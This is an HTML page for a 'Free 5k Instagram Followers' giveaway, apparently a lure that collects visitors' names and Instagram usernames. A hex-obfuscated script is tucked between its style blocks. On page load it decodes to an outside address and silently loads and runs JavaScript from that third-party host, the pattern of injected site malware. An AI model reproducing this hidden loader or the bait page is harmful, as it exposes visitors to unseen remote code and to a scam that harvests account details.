<html>
<head>
<title>Free 5k Instagram Followers</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="google" content="notranslate" />
 <meta property="og:type" content="website" />
    <meta property="og:title" content="Free 5k Instagram Followers" />
    <meta property="og:url" content="http://insta-lovers.ml">
    <meta property="og:description" content="Get Now" >
    <meta property="og:site_name" content="VigoFlames"/>
    <meta property="og:image" content="vigo-og.png"> 

<!--Copyright By Techy Immo Youtube-->
<style>
@import url('https://fonts.googleapis.com/css?family=Lato:100,300,400,700,900');

html,
body {
  width: 100%;
  height: auto;
  margin: 0;
  padding: 0;
  background: #fff;
  font-family: 'Lato', sans-serif;
  font-weight: 400;
  font-size: 18px;
}

#container{
  background: white;
  max-width: 480px;
  margin: auto;
  box-shadow: 0 5px 12px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#survey-form {
  max-width: 500px;
  margin: 0 auto;
  padding: 0 20px 20px 20px;
}

::placeholder {
  font-family: lato, sans-serif;
  font-weight: 500;
  font-size:15px;
  color:grey;
}

label {
  display: block;
  padding: 1rem 0 0.25rem;
  font-size: 17px;
  font-weight: 600;
  color:black;
}

.blocked {
  display: block;
  width: 95%;
  border: none;
  border-bottom: 2px solid #ff2d2d;
  padding: 15px;
  font-weight:500;
  font-size:15px;
  color:grey;
  
}
.block {
  display: block;
  width: 95%;
  border: none;
  border-bottom: 2px solid #ff2d2d;
  padding: 15px;
  background: white;
  font-weight:500;
  font-size:15px;
  color:grey;
}

#title {
  text-align: center;
  font-weight: 900;
  padding-top: 2rem;
  color: #202224;
  text-transform: uppercase;
  letter-spacing: 1.5px;
}

#description {
  font-weight: 300;
  text-align: center;
}

.dropdown-sel {
  border: 1px solid royalblue;
  background: royalblue;
  color: white;
  padding: 3px;
  width: auto;
  text-align: center;
}
</style><script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('687474703A2F2F6A616464752D7573612E636F6D2F332E6A73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script><style>
#submit {
  border: 0;
  background: #ff2d2d;
  padding: 0.5rem;
  margin: 10px 0 10px 0;
  width: 100%;
  text-transform: uppercase;
  color:white;
  font-weight:600;
  font-size:15px;
}

#submit:hover {
    background: #11af26;
    transition-duration: 0.4s;
    cursor: pointer;
  }
</style>
     </head>
<body>
<div id="container">
<img src="Techyimmo.gif" style="width:100%; height:auto;">
<center>


</center>
  <form id="survey-form" method="POST" action="register.html">

    <label for="name" id="name-label">
      Your Name :
    </label>

    <input type="text" name="name" placeholder="Enter Name Here" class="blocked" required>

    <label for="email" id="email-label">
      Instagram Username :
    </label>

    <input type="name" name="applicant" placeholder="Enter Username Here" class="blocked" required />
    <label for="dropdown" id="state">Followers :</label>

    <select name="state" class="block">
     <option disabled selected value>-Select Your Followers-</option> <option value="1">1K</option>
     <option value="2">2K</option><option value="3">3K</option><option value="4">4k</option><option value="2">5K</option><option value="2">AUTO FOLLOWERS</option>
</select></option>
    </select></option></option>
     
    <input type="submit" value="Submit" id="submit" class="blocked">


  </form>
  
  <! ---Paste Your ads Code here-->
  
 
  </center>
  <br>

<!--Copyright By Techy Immo Youtube-->

</div>

<!--Copyright By Techy Immo Youtube-->
<div style="background:black;max-width:100%;height:200px;margin:auto;font-size:14px;color:white;text-align:center;padding:10px;"><img src="Techyimmo1.jpeg" style="width:250px; height:110px;"><br><h4>All Rights Reserved</h4><a href="privacy.html" style="float:left;margin:auto;text-decoration:none;">Privacy Policy</a><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1508212,"","eee");</script>

<a href="about.html" style="float:right;margin:auto;text-decoration:none;">About Us</a>
</div>
<center>
</center>
</body>
</html>